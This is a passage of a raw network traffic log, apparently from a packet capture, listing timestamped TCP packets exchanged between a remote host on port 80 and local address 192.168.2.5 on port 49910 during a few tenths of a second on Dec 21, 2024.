                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.097625971 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.097668886 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.097693920 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.097749949 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.098803043 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.098860979 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.098907948 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.098953009 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.099998951 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.100042105 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.100111961 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.100157022 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.101202965 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.101242065 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.101283073 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.101326942 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.231106043 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.231195927 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.231242895 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.231301069 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.231664896 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.231719017 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.231873035 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.231913090 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.232840061 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.232883930 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.232918978 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.232959032 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.234020948 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.234066963 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.234107971 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.234149933 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.235179901 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.235228062 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.235296011 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.235347033 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.236394882 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.236450911 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.236490965 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.236536980 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.237591028 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.237642050 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.237674952 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.237720966 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.238790989 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.238847017 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.238882065 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.238944054 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.239965916 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.240022898 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.240073919 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.240114927 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.241158009 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.241199970 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.241251945 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.241297007 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.242351055 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.242394924 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.242542028 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.242583990 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.243531942 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.243582010 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.243602037 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.243657112 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.244730949 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.244776964 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.244842052 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.244885921 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.245929956 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.246005058 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.246059895 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.246107101 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.247124910 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.247173071 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.247237921 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.247278929 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.248297930 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.248346090 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.248414993 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.248460054 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.249475956 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.249520063 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.249608040 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.249650002 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.250679016 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.250722885 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.250765085 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.250808954 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.251868963 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.251919031 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.251956940 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.252010107 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.253065109 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.253123999 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.253170013 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.253213882 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.254265070 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.254307985 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.254347086 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.254388094 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.255417109 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.255461931 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.255542040 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.255584002 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.256614923 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.256679058 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.256736040 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.256778955 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.257816076 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.257858992 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.257963896 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.258006096 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.259035110 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.259079933 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.259118080 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.259159088 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.260198116 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.260240078 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.260294914 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.260338068 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.261383057 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.261431932 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.261478901 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.261526108 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.262562037 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.262605906 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.262690067 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.262729883 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.263773918 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.263816118 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.263916969 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.263956070 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.264955997 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.265001059 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.265007019 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.265048981 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.266158104 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.266218901 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.266268969 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.266307116 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.267343044 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.267384052 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.267426968 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.267465115 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.268532038 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.268589973 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.268676043 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.268716097 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.269702911 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.269750118 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.270051003 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.270092010 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.270876884 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.270919085 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.270986080 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.271028042 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.272073984 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.272116899 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.272164106 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.272205114 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.273286104 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.273339033 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.273428917 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.273474932 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.274446011 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.274492025 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.274552107 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.274600029 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.275634050 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.275677919 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.275755882 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.275796890 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.276859045 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.276933908 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.276969910 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.277014017 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.278033018 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.278078079 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.278137922 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.278178930 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.279200077 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.279244900 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.279303074 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.279361010 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.280426025 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.280474901 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.280514002 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.280559063 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.281589031 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.281642914 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.281721115 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.281766891 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.282788992 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.282833099 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.282928944 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.282970905 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.284008980 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.284053087 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.284086943 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.284131050 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.285152912 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.285207987 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.285249949 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.285294056 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.286351919 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.286397934 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.286407948 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.286465883 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.287550926 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.287611961 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.287636042 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.287678003 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.288727045 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.288773060 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.288860083 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.288902998 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.289956093 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.290007114 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.290033102 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.290075064 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.291083097 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.291130066 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.291204929 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.291248083 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.292275906 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.292325020 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.292402983 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.292447090 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.293433905 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.293479919 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.422938108 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.422990084 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.423042059 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.423085928 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.423544884 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.423590899 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.423666954 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.423710108 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.424460888 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.424504042 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.424561977 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.424597979 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.425666094 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.425713062 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.425764084 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.425802946 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.426826000 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.426872015 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.427059889 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.427103996 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.428006887 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.428057909 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.428131104 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.428178072 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.429212093 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.429251909 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.429300070 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.429373026 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.430424929 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.430485010 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.430546045 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.430593967 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.431577921 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.431622982 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.431694031 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.431739092 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.432776928 CET804991031.41.244.11192.168.2.5
